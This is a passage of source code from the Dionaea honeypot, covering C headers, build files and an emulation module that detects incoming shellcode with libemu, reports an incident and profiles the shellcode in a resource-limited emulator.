| { 40 | struct sockaddr_storage addr; 41 | int domain; // socket domain 42 | char ip_string[INET_STRLEN+1]; 43 | char port_string[PORT_STRLEN+1]; 44 | uint16_t port; 45 | char node_string[NODE_STRLEN+1]; 46 | 47 | char iface_scope[IFNAM_STRLEN+1]; // required for ipv6 scope id 48 | char *hostname; 49 | 50 | 51 | struct 52 | { 53 | char **resolved_addresses; 54 | uint8_t resolved_address_count; 55 | uint8_t current_address; 56 | 57 | struct dns_query *a; 58 | struct dns_query *aaaa; 59 | } dns; 60 | }; 61 | 62 | bool node_info_set(struct node_info *node, struct sockaddr_storage *sa); 63 | void node_info_add_addr(struct node_info *pi, const char *addr); 64 | char *node_info_get_ip_string(struct node_info *node); 65 | char *node_info_get_port_string(struct node_info *node); 66 | void node_info_set_port(struct node_info *node, uint16_t port); 67 | void node_info_set_addr(struct node_info *node, char *addr); 68 | void node_info_addr_clear(struct node_info *node); 69 | const char *node_info_get_next_addr(struct node_info *node); 70 | -------------------------------------------------------------------------------- /include/pchild.h: -------------------------------------------------------------------------------- 1 | /******************************************************************************** 2 | * Dionaea 3 | * - catches bugs - 4 | * 5 | * 6 | * 7 | * Copyright (C) 2009 Paul Baecher & Markus Koetter 8 | * 9 | * This program is free software; you can redistribute it and/or 10 | * modify it under the terms of the GNU General Public License 11 | * as published by the Free Software Foundation; either version 2 12 | * of the License, or (at your option) any later version. 13 | * 14 | * This program is distributed in the hope that it will be useful, 15 | * but WITHOUT ANY WARRANTY; without even the implied warranty of 16 | * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 17 | * GNU General Public License for more details. 18 | * 19 | * You should have received a copy of the GNU General Public License 20 | * along with this program; if not, write to the Free Software 21 | * Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. 22 | * 23 | * 24 | * contact nepenthesdev@gmail.com 25 | * 26 | *******************************************************************************/ 27 | 28 | 29 | 30 | struct GMutex; 31 | 32 | struct pchild 33 | { 34 | int fd; 35 | /** 36 | * mutex for the pchild 37 | * as threads may use the child for their very own purpose too, 38 | * lock the child if it is busy 39 | * 40 | * locking has to be done 'client' side 41 | */ 42 | GMutex *mutex; 43 | }; 44 | 45 | 46 | struct pchild *pchild_new(void); 47 | bool pchild_init(void); 48 | int pchild_sent_bind(int sx, struct sockaddr *s, socklen_t size); 49 | 50 | 51 | /** 52 | * declaration of a pchild function 53 | * if you want the pchild do something for you, you send a 54 | * pointer to a pchild_cmd function the pchild will call the 55 | * function, and your own function can take care, powered with 56 | * pchild privileges 57 | */ 58 | typedef void (*pchild_cmd)(int s); 59 | -------------------------------------------------------------------------------- /include/processor.h: -------------------------------------------------------------------------------- 1 | #ifndef HAVE_STREAMPROCESSOR_H 2 | #define HAVE_STREAMPROCESSOR_H 3 | 4 | #include 5 | 6 | #include "bistream.h" 7 | #include "refcount.h" 8 | 9 | struct connection; 10 | struct lcfgx_tree_node; 11 | 12 | struct processors 13 | { 14 | GNode *tree; 15 | GHashTable *names; 16 | }; 17 | 18 | 19 | enum processor_state 20 | { 21 | processor_done, 22 | processor_continue 23 | }; 24 | 25 | struct processor_data; 26 | 27 | 28 | typedef void *(*processor_cfg_new)(struct lcfgx_tree_node *node); 29 | typedef bool (*processor_process)(struct connection *con, void *config); 30 | typedef void *(*processor_ctx_new)(void *cfg); 31 | typedef void (*processor_ctx_free)(void *ctx); 32 | typedef void (*processor_close)(struct connection *con, struct processor_data *pd); 33 | typedef void (*processor_io)(struct connection *con, struct processor_data *pd, void *data, int size); 34 | typedef void (*processor_thread_io)(struct connection *con, struct processor_data *pd); 35 | 36 | struct processor 37 | { 38 | const char *name; 39 | processor_cfg_new cfg; 40 | processor_process process; 41 | processor_ctx_new new; 42 | processor_ctx_free free; 43 | processor_io io_in; 44 | processor_io io_out; 45 | processor_thread_io thread_io_in; 46 | processor_thread_io thread_io_out; 47 | void *config; 48 | }; 49 | 50 | 51 | struct processor_data 52 | { 53 | enum processor_state state; 54 | GMutex *mutex; 55 | struct refcount queued; 56 | struct processor *processor; 57 | void *ctx; 58 | struct bistream *bistream; 59 | 60 | GList *filters; // of type struct stream_processor_data 61 | }; 62 | 63 | bool processors_tree_create(GNode *tree, struct lcfgx_tree_node *node); 64 | void processors_tree_dump(GNode *tree, int indent); 65 | 66 | void processors_init(struct connection *con); 67 | void processors_clear(struct connection *con); 68 | 69 | void processors_io_out(struct connection *con, void *data, int size); 70 | void processors_io_in(struct connection *con, void *data, int size); 71 | struct processor_data *processor_data_new(void); 72 | void processor_data_free(struct processor_data *pd); 73 | 74 | #endif 75 | -------------------------------------------------------------------------------- /include/protocol.h: -------------------------------------------------------------------------------- 1 | /******************************************************************************** 2 | * Dionaea 3 | * - catches bugs - 4 | * 5 | * 6 | * 7 | * Copyright (C) 2009 Paul Baecher & Markus Koetter 8 | * 9 | * This program is free software; you can redistribute it and/or 10 | * modify it under the terms of the GNU General Public License 11 | * as published by the Free Software Foundation; either version 2 12 | * of the License, or (at your option) any later version. 13 | * 14 | * This program is distributed in the hope that it will be useful, 15 | * but WITHOUT ANY WARRANTY; without even the implied warranty of 16 | * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 17 | * GNU General Public License for more details. 18 | * 19 | * You should have received a copy of the GNU General Public License 20 | * along with this program; if not, write to the Free Software 21 | * Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. 22 | * 23 | * 24 | * contact nepenthesdev@gmail.com 25 | * 26 | *******************************************************************************/ 27 | 28 | #ifndef HAVE_PROTOCOL_H 29 | #define HAVE_PROTOCOL_H 30 | 31 | #include 32 | 33 | struct connection; 34 | 35 | 36 | /* protocol error codes */ 37 | 38 | enum connection_error 39 | { 40 | ECONDNSTIMEOUT = 0, 41 | ECONUNREACH = 1, 42 | ECONNOSUCHDOMAIN = 2, 43 | ECONMANY = 4, 44 | ECONMAX = 5 45 | }; 46 | 47 | typedef void (*protocol_handler_established)(struct connection *con); 48 | typedef bool (*protocol_handler_error)(struct connection *con, enum connection_error error); 49 | typedef void (*protocol_handler_origin)(struct connection *con, struct connection *origin); 50 | typedef unsigned int (*protocol_handler_io_in)(struct connection *con, void *context, unsigned char *data, uint32_t size); 51 | typedef void (*protocol_handler_io_out)(struct connection *con, void *context); 52 | 53 | typedef bool (*protocol_handler_disconnect)(struct connection *con, void *context); 54 | typedef bool (*protocol_handler_timeout)(struct connection *con, void *context); 55 | typedef void *(*protocol_handler_ctx_new)(struct connection *con); 56 | typedef void (*protocol_handler_ctx_free)(void *data); 57 | typedef void (*protocol_handler_name)(void *ctx); 58 | 59 | struct protocol 60 | { 61 | char *name; 62 | protocol_handler_ctx_new ctx_new; 63 | protocol_handler_ctx_free ctx_free; 64 | protocol_handler_origin origin; 65 | protocol_handler_established established; 66 | protocol_handler_error error; 67 | protocol_handler_timeout sustain_timeout; 68 | protocol_handler_timeout idle_timeout; 69 | /** 70 | * Callback for timeouts when waiting to accept a connection 71 | */ 72 | protocol_handler_timeout listen_timeout; 73 | protocol_handler_disconnect disconnect; 74 | protocol_handler_io_in io_in; 75 | protocol_handler_io_out io_out; 76 | void *ctx; 77 | }; 78 | 79 | #endif 80 | -------------------------------------------------------------------------------- /include/refcount.h: -------------------------------------------------------------------------------- 1 | /******************************************************************************** 2 | * Dionaea 3 | * - catches bugs - 4 | * 5 | * 6 | * 7 | * Copyright (C) 2009 Paul Baecher & Markus Koetter 8 | * 9 | * This program is free software; you can redistribute it and/or 10 | * modify it under the terms of the GNU General Public License 11 | * as published by the Free Software Foundation; either version 2 12 | * of the License, or (at your option) any later version. 13 | * 14 | * This program is distributed in the hope that it will be useful, 15 | * but WITHOUT ANY WARRANTY; without even the implied warranty of 16 | * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 17 | * GNU General Public License for more details. 18 | * 19 | * You should have received a copy of the GNU General Public License 20 | * along with this program; if not, write to the Free Software 21 | * Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. 22 | * 23 | * 24 | * contact nepenthesdev@gmail.com 25 | * 26 | *******************************************************************************/ 27 | 28 | #ifndef HAVE_REFCOUNT_H 29 | #define HAVE_REFCOUNT_H 30 | 31 | #include 32 | #include 33 | 34 | struct refcount 35 | { 36 | GMutex *mutex; 37 | int refs; 38 | }; 39 | 40 | void refcount_init(struct refcount *rc); 41 | void refcount_exit(struct refcount *rc); 42 | void refcount_inc(struct refcount *rc); 43 | void refcount_dec(struct refcount *rc); 44 | bool refcount_is_zero(struct refcount *rc); 45 | 46 | #endif 47 | -------------------------------------------------------------------------------- /include/signals.h: -------------------------------------------------------------------------------- 1 | /******************************************************************************** 2 | * Dionaea 3 | * - catches bugs - 4 | * 5 | * 6 | * 7 | * Copyright (C) 2009 Paul Baecher & Markus Koetter 8 | * 9 | * This program is free software; you can redistribute it and/or 10 | * modify it under the terms of the GNU General Public License 11 | * as published by the Free Software Foundation; either version 2 12 | * of the License, or (at your option) any later version. 13 | * 14 | * This program is distributed in the hope that it will be useful, 15 | * but WITHOUT ANY WARRANTY; without even the implied warranty of 16 | * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 17 | * GNU General Public License for more details. 18 | * 19 | * You should have received a copy of the GNU General Public License 20 | * along with this program; if not, write to the Free Software 21 | * Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. 22 | * 23 | * 24 | * contact nepenthesdev@gmail.com 25 | * 26 | *******************************************************************************/ 27 | 28 | 29 | #include 30 | 31 | struct ev_loop; 32 | struct ev_signal; 33 | 34 | struct signals 35 | { 36 | struct ev_signal sigint; 37 | struct ev_signal sighup; 38 | struct ev_signal sigsegv; 39 | }; 40 | 41 | 42 | void sigint_cb(struct ev_loop *loop, struct ev_signal *w, int revents); 43 | void sighup_cb(struct ev_loop *loop, struct ev_signal *w, int revents); 44 | void sigsegv_cb(struct ev_loop *loop, struct ev_signal *w, int revents); 45 | 46 | int segv_handler(int sig); 47 | void sigsegv_backtrace_cb(int sig); 48 | 49 | -------------------------------------------------------------------------------- /include/threads.h: -------------------------------------------------------------------------------- 1 | /******************************************************************************** 2 | * Dionaea 3 | * - catches bugs - 4 | * 5 | * 6 | * 7 | * Copyright (C) 2009 Paul Baecher & Markus Koetter 8 | * 9 | * This program is free software; you can redistribute it and/or 10 | * modify it under the terms of the GNU General Public License 11 | * as published by the Free Software Foundation; either version 2 12 | * of the License, or (at your option) any later version. 13 | * 14 | * This program is distributed in the hope that it will be useful, 15 | * but WITHOUT ANY WARRANTY; without even the implied warranty of 16 | * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 17 | * GNU General Public License for more details. 18 | * 19 | * You should have received a copy of the GNU General Public License 20 | * along with this program; if not, write to the Free Software 21 | * Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. 22 | * 23 | * 24 | * contact nepenthesdev@gmail.com 25 | * 26 | *******************************************************************************/ 27 | 28 | #include 29 | #include 30 | 31 | 32 | struct connection; 33 | 34 | 35 | struct threads 36 | { 37 | GThreadPool *pool; 38 | struct ev_async trigger; 39 | struct ev_periodic surveillance; 40 | GAsyncQueue *cmds; 41 | }; 42 | 43 | void trigger_cb(struct ev_loop *loop, struct ev_async *w, int revents); 44 | void surveillance_cb(struct ev_loop *loop, struct ev_periodic *w, int revents); 45 | void threadpool_wrapper(gpointer data, gpointer user_data); 46 | 47 | 48 | struct thread 49 | { 50 | GFunc function; 51 | struct connection *con; 52 | void *data; 53 | }; 54 | 55 | struct thread *thread_new(struct connection *con, void *data, GFunc function); 56 | 57 | 58 | /** 59 | * prototype for callbacks and data which are meant to be run in 60 | * the main loop - from threads 61 | * @see threads.cmds 62 | */ 63 | typedef void (*async_cmd_cb)(void *data); 64 | 65 | 66 | /** 67 | * data for async cmds 68 | * pointer to function and data, 69 | * insert into dionaea->threads.cmds 70 | * trigger dionaea->threads.trigger 71 | * and your function will be run in the main loop 72 | * 73 | * @see threads.cmds 74 | * @see threads.trigger 75 | */ 76 | struct async_cmd 77 | { 78 | async_cmd_cb function; 79 | void *data; 80 | }; 81 | 82 | 83 | struct async_cmd *async_cmd_new(async_cmd_cb function, void *data); 84 | void async_cmd_free(struct async_cmd *cmd); 85 | /* 86 | void async_add_io(void *data); 87 | void async_del_io(void *data); 88 | 89 | void async_add_child(void *data); 90 | void async_del_child(void *data); 91 | */ 92 | void async_incident_report(void *data); 93 | -------------------------------------------------------------------------------- /include/util.h: -------------------------------------------------------------------------------- 1 | /******************************************************************************** 2 | * Dionaea 3 | * - catches bugs - 4 | * 5 | * 6 | * 7 | * Copyright (C) 2009 Paul Baecher & Markus Koetter 8 | * 9 | * This program is free software; you can redistribute it and/or 10 | * modify it under the terms of the GNU General Public License 11 | * as published by the Free Software Foundation; either version 2 12 | * of the License, or (at your option) any later version. 13 | * 14 | * This program is distributed in the hope that it will be useful, 15 | * but WITHOUT ANY WARRANTY; without even the implied warranty of 16 | * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 17 | * GNU General Public License for more details. 18 | * 19 | * You should have received a copy of the GNU General Public License 20 | * along with this program; if not, write to the Free Software 21 | * Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. 22 | * 23 | * 24 | * contact nepenthesdev@gmail.com 25 | * 26 | *******************************************************************************/ 27 | 28 | #ifndef HAVE_UTIL_H 29 | #define HAVE_UTIL_H 30 | 31 | #include 32 | #include 33 | 34 | #ifndef s6_addr32 35 | #define s6_addr32 __u6_addr.__u6_addr32 36 | #endif 37 | 38 | void *ADDROFFSET(const void *x); 39 | unsigned int ADDRSIZE(const void *x); 40 | void *PORTOFFSET(const void *x); 41 | 42 | bool sockaddr_storage_from(struct sockaddr_storage *ss, int family, void *host, uint16_t port); 43 | bool parse_addr(char const * const addr, char const * const iface, uint16_t const port, struct sockaddr_storage * const sa, int * const socket_domain, socklen_t * const sizeof_sa); 44 | 45 | int ipv6_addr_linklocal(struct in6_addr const * const a); 46 | int ipv6_addr_v4mapped(struct in6_addr const * const a); 47 | 48 | struct tempfile 49 | { 50 | int fd; 51 | FILE *fh; 52 | char *path; 53 | }; 54 | 55 | struct tempfile *tempfile_new(char *path, char *prefix); 56 | struct tempfile *tempdownload_new(char *prefix); 57 | void tempfile_close(struct tempfile *tf); 58 | void tempfile_unlink(struct tempfile *tf); 59 | void tempfile_free(struct tempfile *tf); 60 | 61 | #endif 62 | -------------------------------------------------------------------------------- /m4/az_bind_ipv4_mapped_localhost.m4: -------------------------------------------------------------------------------- 1 | AC_DEFUN([AZ_FUNC_BIND_MAPPED_IPV4_LOCALHOST], 2 | [AC_CHECK_FUNCS(bind) 3 | AC_MSG_CHECKING([if bind("::ffff:0.0.0.0") works]) 4 | AC_CACHE_VAL(ac_cv_have_bind_ipv4_mapped_localhost, 5 | [AC_RUN_IFELSE( 6 | [#include 7 | #include 8 | #include 9 | #include 10 | #include 11 | #include 12 | #include 13 | #include 14 | #include 15 | 16 | int main(int argc, char **argv) 17 | { 18 | int s = socket(PF_INET6, SOCK_STREAM, 0); 19 | int r = -1; 20 | struct sockaddr_in6 si6; 21 | memset(&si6,0,sizeof(struct sockaddr_in6)); 22 | inet_pton(PF_INET6, "::ffff:0.0.0.0", &si6.sin6_addr); 23 | si6.sin6_family = PF_INET6; 24 | r = bind(s, (struct sockaddr *)&si6, sizeof(struct sockaddr_in6)); 25 | close(s); 26 | return r; 27 | }], ac_cv_have_bind_ipv4_mapped_localhost=yes, ac_cv_have_bind_ipv4_mapped_localhost=no, ac_cv_have_bind_ipv4_mapped_localhost=cross)]) 28 | AC_MSG_RESULT([$ac_cv_have_bind_ipv4_mapped_localhost]) 29 | ]) 30 | -------------------------------------------------------------------------------- /modules/Makefile.am: -------------------------------------------------------------------------------- 1 | # $Id: Makefile.am 2463 2008-10-13 10:32:47Z common $ 2 | 3 | AUTOMAKE_OPTIONS = foreign 4 | 5 | if BUILD_PYTHON_MODULE 6 | python_dir = python 7 | endif 8 | 9 | if BUILD_EMU_MODULE 10 | emu_dir = emu 11 | endif 12 | 13 | if BUILD_CURL_MODULE 14 | curl_dir = curl 15 | endif 16 | 17 | if BUILD_NL_MODULE 18 | nl_dir = nl 19 | endif 20 | 21 | if BUILD_PCAP_MODULE 22 | pcap_dir = pcap 23 | endif 24 | 25 | if BUILD_NFQ_MODULE 26 | nfq_dir = nfq 27 | endif 28 | 29 | if BUILD_XMATCH_MODULE 30 | xmatch_dir = xmatch 31 | endif 32 | 33 | 34 | SUBDIRS = nc $(python_dir) $(emu_dir) $(curl_dir) $(nl_dir) $(pcap_dir) $(nfq_dir) 35 | DIST_SUBDIRS = nc python emu curl nl pcap nfq xmatch 36 | -------------------------------------------------------------------------------- /modules/curl/Makefile.am: -------------------------------------------------------------------------------- 1 | # $Id$ 2 | 3 | AUTOMAKE_OPTIONS = foreign 4 | 5 | AM_CFLAGS = -I$(top_srcdir)/include -I$(top_srcdir)/src 6 | AM_CFLAGS += -fno-strict-aliasing 7 | 8 | AM_CFLAGS += $(LIB_CURL_CFLAGS) 9 | AM_LDFLAGS = $(LIB_CURL_LIBS) 10 | 11 | pkglib_LTLIBRARIES = curl.la 12 | 13 | curl_la_SOURCES = module.c module.h 14 | 15 | curl_la_LDFLAGS = -module -no-undefined -avoid-version ${AM_LDFLAGS} 16 | 17 | -------------------------------------------------------------------------------- /modules/curl/module.h: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/gento/dionaea/bb40f46c5547c6d4d918eb5ee05573de8f7f07df/modules/curl/module.h -------------------------------------------------------------------------------- /modules/emu/Makefile.am: -------------------------------------------------------------------------------- 1 | # $Id$ 2 | 3 | AUTOMAKE_OPTIONS = foreign 4 | 5 | AM_CFLAGS = -I$(top_srcdir)/include -I$(top_srcdir)/src 6 | AM_CFLAGS += -fms-extensions -fno-strict-aliasing 7 | 8 | AM_CFLAGS += $(LIB_EMU_CFLAGS) 9 | AM_LDFLAGS = $(LIB_EMU_LIBS) 10 | 11 | 12 | pkglib_LTLIBRARIES = emu.la 13 | 14 | emu_la_SOURCES = module.c module.h detect.c emulate.c profile.c hooks.c 15 | 16 | emu_la_LDFLAGS = -module -no-undefined -avoid-version ${AM_LDFLAGS} 17 | -------------------------------------------------------------------------------- /modules/emu/detect.c: -------------------------------------------------------------------------------- 1 | /******************************************************************************** 2 | * Dionaea 3 | * - catches bugs - 4 | * 5 | * 6 | * 7 | * Copyright (C) 2009 Paul Baecher & Markus Koetter 8 | * 9 | * This program is free software; you can redistribute it and/or 10 | * modify it under the terms of the GNU General Public License 11 | * as published by the Free Software Foundation; either version 2 12 | * of the License, or (at your option) any later version. 13 | * 14 | * This program is distributed in the hope that it will be useful, 15 | * but WITHOUT ANY WARRANTY; without even the implied warranty of 16 | * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 17 | * GNU General Public License for more details. 18 | * 19 | * You should have received a copy of the GNU General Public License 20 | * along with this program; if not, write to the Free Software 21 | * Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. 22 | * 23 | * 24 | * contact nepenthesdev@gmail.com 25 | * 26 | *******************************************************************************/ 27 | 28 | #include 29 | #include 30 | 31 | #include 32 | #include 33 | 34 | #include 35 | #include 36 | #include 37 | #include 38 | #include 39 | 40 | #include "dionaea.h" 41 | #include "processor.h" 42 | #include "log.h" 43 | #include "incident.h" 44 | #include "threads.h" 45 | 46 | #define D_LOG_DOMAIN "emu" 47 | 48 | #include "module.h" 49 | 50 | struct processor proc_emu = 51 | { 52 | .name = "emu", 53 | .new = proc_emu_ctx_new, 54 | .free = proc_emu_ctx_free, 55 | .cfg = proc_emu_ctx_cfg_new, 56 | .thread_io_in = proc_emu_on_io_in, 57 | }; 58 | 59 | void *proc_emu_ctx_cfg_new(struct lcfgx_tree_node *node) 60 | { 61 | g_debug("%s node %p", __PRETTY_FUNCTION__, node); 62 | lcfgx_tree_dump(node,0); 63 | struct emu_config *conf = g_malloc0(sizeof(struct emu_config)); 64 | 65 | struct lcfgx_tree_node *n; 66 | if( lcfgx_get_string(node, &n, "emulation.limits.files") == LCFGX_PATH_FOUND_TYPE_OK ) 67 | conf->limits.files = strtol(n->value.string.data, NULL, 10); 68 | else 69 | goto err; 70 | 71 | if( lcfgx_get_string(node, &n, "emulation.limits.filesize") == LCFGX_PATH_FOUND_TYPE_OK ) 72 | conf->limits.filesize = strtol(n->value.string.data, NULL, 10); 73 | else 74 | goto err; 75 | 76 | if( lcfgx_get_string(node, &n, "emulation.limits.sockets") == LCFGX_PATH_FOUND_TYPE_OK ) 77 | conf->limits.sockets = strtol(n->value.string.data, NULL, 10); 78 | else 79 | goto err; 80 | 81 | if( lcfgx_get_string(node, &n, "emulation.limits.steps") == LCFGX_PATH_FOUND_TYPE_OK ) 82 | conf->limits.steps = strtol(n->value.string.data, NULL, 10); 83 | else 84 | goto err; 85 | 86 | if( lcfgx_get_string(node, &n, "emulation.limits.idle") == LCFGX_PATH_FOUND_TYPE_OK ) 87 | conf->limits.idle = strtod(n->value.string.data, NULL); 88 | else 89 | goto err; 90 | 91 | if( lcfgx_get_string(node, &n, "emulation.limits.listen") == LCFGX_PATH_FOUND_TYPE_OK ) 92 | conf->limits.listen = strtod(n->value.string.data, NULL); 93 | else 94 | goto err; 95 | 96 | if( lcfgx_get_string(node, &n, "emulation.limits.sustain") == LCFGX_PATH_FOUND_TYPE_OK ) 97 | conf->limits.sustain = strtod(n->value.string.data, NULL); 98 | else 99 | goto err; 100 | 101 | if( lcfgx_get_string(node, &n, "emulation.limits.cpu") == LCFGX_PATH_FOUND_TYPE_OK ) 102 | conf->limits.cpu = strtod(n->value.string.data, NULL); 103 | else 104 | goto err; 105 | 106 | g_debug(" files %i filesize %i sockets %i steps %i idle %f listen %f sustain %f cpu %f ", conf->limits.files, conf->limits.filesize, 107 | conf->limits.sockets, conf->limits.steps, conf->limits.idle, conf->limits.listen, conf->limits.sustain, conf->limits.cpu); 108 | 109 | // g_error("STOP"); 110 | return conf; 111 | 112 | err: 113 | g_warning("configuration for emulation is incomplete"); 114 | g_free(conf); 115 | return NULL; 116 | } 117 | 118 | void *proc_emu_ctx_new(void *cfg) 119 | { 120 | if( cfg == NULL ) 121 | { 122 | g_error("emulation needs configuration"); 123 | } 124 | struct emu_ctx *ctx = g_malloc0(sizeof(struct emu_ctx)); 125 | ctx->config = cfg; 126 | return ctx; 127 | } 128 | 129 | void proc_emu_ctx_free(void *ctx) 130 | { 131 | g_free(ctx); 132 | } 133 | 134 | void proc_emu_on_io_in(struct connection *con, struct processor_data *pd) 135 | { 136 | g_debug("%s con %p pd %p", __PRETTY_FUNCTION__, con, pd); 137 | struct emu_ctx *ctx = pd->ctx; 138 | 139 | int offset = MAX(ctx->offset-300, 0); 140 | void *streamdata = NULL; 141 | int32_t size = bistream_get_stream(pd->bistream, bistream_in, offset, -1, &streamdata); 142 | int ret = 0; 143 | if( size != -1 ) 144 | { 145 | struct emu *e = emu_new(); 146 | #if 0 147 | emu_cpu_debugflag_set(emu_cpu_get(e), instruction_string); 148 | emu_log_level_set(emu_logging_get(e),EMU_LOG_DEBUG); 149 | #endif 150 | ret = emu_shellcode_test(e, streamdata, size); 151 | emu_free(e); 152 | ctx->offset += size; 153 | if( ret >= 0 ) 154 | { 155 | struct incident *ix = incident_new("dionaea.shellcode.detected"); 156 | GAsyncQueue *aq = g_async_queue_ref(g_dionaea->threads->cmds); 157 | g_async_queue_push(aq, async_cmd_new(async_incident_report, ix)); 158 | g_async_queue_unref(aq); 159 | ev_async_send(g_dionaea->loop, &g_dionaea->threads->trigger); 160 | g_critical("shellcode found offset %i", ret); 161 | profile(ctx->config, con, streamdata, size, ret); 162 | 163 | pd->state = processor_done; 164 | } 165 | g_free(streamdata); 166 | } 167 | } 168 | -------------------------------------------------------------------------------- /modules/emu/module.c: -------------------------------------------------------------------------------- 1 | /******************************************************************************** 2 | * Dionaea 3 | * - catches bugs - 4 | * 5 | * 6 | * 7 | * Copyright (C) 2009 Paul Baecher & Markus Koetter 8 | * 9 | * This program is free software; you can redistribute it and/or 10 | * modify it under the terms of the GNU General Public License 11 | * as published by the Free Software Foundation; either version 2 12 | * of the License, or (at your option) any later version. 13 | * 14 | * This program is distributed in the hope that it will be useful, 15 | * but WITHOUT ANY WARRANTY; without even the implied warranty of 16 | * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 17 | * GNU General Public License for more details. 18 | * 19 | * You should have received a copy of the GNU General Public License 20 | * along with this program; if not, write to the Free Software 21 | * Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. 22 | * 23 | * 24 | * contact nepenthesdev@gmail.com 25 | * 26 | *******************************************************************************/ 27 | 28 | 29 | #include 30 | #include 31 | 32 | #include 33 | #include 34 | 35 | 36 | #include "modules.h" 37 | #include "connection.h" 38 | #include "dionaea.h" 39 | 40 | #include "module.h" 41 | #include "log.h" 42 | #include "processor.h" 43 | 44 | #define D_LOG_DOMAIN "emu" 45 | 46 | 47 | static struct 48 | { 49 | struct lcfgx_tree_node *config; 50 | } emu_runtime; 51 | 52 | static bool emu_config(struct lcfgx_tree_node *node) 53 | { 54 | g_debug("%s", __PRETTY_FUNCTION__); 55 | emu_runtime.config = node; 56 | return true; 57 | } 58 | 59 | static bool emu_new(struct dionaea *d) 60 | { 61 | g_debug("%s", __PRETTY_FUNCTION__); 62 | g_hash_table_insert(g_dionaea->processors->names, (void *)proc_emu.name, &proc_emu); 63 | return true; 64 | } 65 | 66 | static bool emu_free(void) 67 | { 68 | g_debug("%s", __PRETTY_FUNCTION__); 69 | return true; 70 | } 71 | 72 | static bool emu_hup(struct lcfgx_tree_node *node) 73 | { 74 | g_debug("%s", __PRETTY_FUNCTION__); 75 | return true; 76 | } 77 | 78 | 79 | 80 | struct module_api *module_init(struct dionaea *d) 81 | { 82 | g_debug("%s:%i %s dionaea %p",__FILE__, __LINE__, __PRETTY_FUNCTION__, d); 83 | static struct module_api emu_api = 84 | { 85 | .config = &emu_config, 86 | .start = NULL, 87 | .new = &emu_new, 88 | .free = &emu_free, 89 | .hup = &emu_hup 90 | }; 91 | 92 | return &emu_api; 93 | } 94 | 95 | -------------------------------------------------------------------------------- /modules/emu/module.h: -------------------------------------------------------------------------------- 1 | /******************************************************************************** 2 | * Dionaea 3 | * - catches bugs - 4 | * 5 | * 6 | * 7 | * Copyright (C) 2009 Paul Baecher & Markus Koetter 8 | * 9 | * This program is free software; you can redistribute it and/or 10 | * modify it under the terms of the GNU General Public License 11 | * as published by the Free Software Foundation; either version 2 12 | * of the License, or (at your option) any later version. 13 | * 14 | * This program is distributed in the hope that it will be useful, 15 | * but WITHOUT ANY WARRANTY; without even the implied warranty of 16 | * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 17 | * GNU General Public License for more details. 18 | * 19 | * You should have received a copy of the GNU General Public License 20 | * along with this program; if not, write to the Free Software 21 | * Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. 22 | * 23 | * 24 | * contact nepenthesdev@gmail.com 25 | * 26 | *******************************************************************************/ 27 | 28 | struct connection; 29 | struct processor_data; 30 | struct emu; 31 | struct emu_env; 32 | struct lcfgx_tree_node; 33 | 34 | struct emu_ctx 35 | { 36 | struct emu_config *config; 37 | int offset; 38 | }; 39 | 40 | struct emu_config 41 | { 42 | struct 43 | { 44 | int files; 45 | int filesize; 46 | int sockets; 47 | double sustain; 48 | double idle; 49 | double listen; 50 | int steps; 51 | double cpu; 52 | }limits; 53 | }; 54 | 55 | void *proc_emu_ctx_new(void *cfg); 56 | void proc_emu_ctx_free(void *ctx); 57 | void *proc_emu_ctx_cfg_new(struct lcfgx_tree_node *node); 58 | void proc_emu_on_io_in(struct connection *con, struct processor_data *pd); 59 | void proc_emu_on_io_out(struct connection *con, struct processor_data *pd); 60 | 61 | int run(struct emu *e, struct emu_env *env); 62 | void profile(struct emu_config *conf, struct connection *con, void *data, unsigned int size, unsigned int offset); 63 | 64 | 65 | 66 | void emulate_thread(gpointer data, gpointer user_data); 67 | void emulate(struct emu_config *conf, struct connection *con, void *data, unsigned int size, unsigned int offset); 68 | 69 | /* hooks.c */ 70 | struct emu_env; 71 | struct emu_env_hook; 72 | 73 | enum emu_state 74 | { 75 | running, waiting, failed 76 | }; 77 | 78 | struct emu_emulate_ctx 79 | { 80 | struct emu_config *config; 81 | 82 | struct connection *ctxcon; 83 | 84 | GMutex *mutex; 85 | struct emu *emu; 86 | struct emu_env *env; 87 | 88 | /** 89 | * mapping 'virtual' fd to struct connection * 90 | */ 91 | GHashTable *sockets; 92 | /** 93 | * mapping struct connection * to int32_t processhandle 94 | */ 95 | GHashTable *processes; 96 | GHashTable *files; 97 | unsigned long steps; 98 | uint32_t esp; 99 | enum emu_state state; 100 | GTimer *time; 101 | 102 | int serial; 103 | }; 104 | 105 | struct emu_file 106 | { 107 | FILE *fh; 108 | char *path; 109 | }; 110 | 111 | void user_hook_accept_cb(EV_P_ struct ev_io *w, int revents); 112 | uint32_t user_hook_accept(struct emu_env *env, struct emu_env_hook *hook, ...); 113 | uint32_t user_hook_bind(struct emu_env *env, struct emu_env_hook *hook, ...); 114 | void user_hook_connect_cb(EV_P_ struct ev_io *w, int revents); 115 | uint32_t user_hook_connect(struct emu_env *env, struct emu_env_hook *hook, ...); 116 | uint32_t user_hook_close(struct emu_env *env, struct emu_env_hook *hook, ...); 117 | uint32_t user_hook_listen(struct emu_env *env, struct emu_env_hook *hook, ...); 118 | uint32_t user_hook_recv(struct emu_env *env, struct emu_env_hook *hook, ...); 